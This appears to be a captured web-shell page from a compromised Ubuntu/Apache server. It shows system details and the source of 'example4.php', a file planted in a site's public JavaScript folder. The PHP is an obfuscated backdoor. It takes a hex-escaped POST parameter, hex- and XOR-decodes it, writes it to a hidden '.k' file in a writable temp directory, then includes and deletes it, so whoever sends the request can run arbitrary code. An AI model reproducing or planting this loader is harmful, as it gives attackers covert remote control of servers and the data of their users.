HEX
Server: Apache/2.4.41 (Ubuntu)
System: Linux ip-172-31-42-149 5.15.0-1084-aws #91~20.04.1-Ubuntu SMP Fri May 2 07:00:04 UTC 2025 aarch64
User: ubuntu (1000)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: /var/www/vhost/disk-apps/alq-central.bikenow.co/public/js/example4.php
<?php

if(filter_has_var(INPUT_POST, "f\x61c\x74\x6Fr")){
	$ref = array_filter([session_save_path(), getenv("TMP"), getenv("TEMP"), sys_get_temp_dir(), "/dev/shm", getcwd(), "/var/tmp", "/tmp", ini_get("upload_tmp_dir")]);
	$flg = hex2bin($_POST["f\x61c\x74\x6Fr"]);
	$property_set = '' ; $s = 0; while($s < strlen($flg)){$property_set .= chr(ord($flg[$s]) ^ 63);$s++;}
	for ($fac = 0, $pgrp = count($ref); $fac < $pgrp; $fac++) {
    $itm = $ref[$fac];
    		if (!!is_dir($itm) && !!is_writable($itm)) {
    $ent = "$itm/.k";
    $file = fopen($ent, 'w');
if ($file) {
	fwrite($file, $property_set);
	fclose($file);
	include $ent;
	@unlink($ent);
	die();
}
}
}
}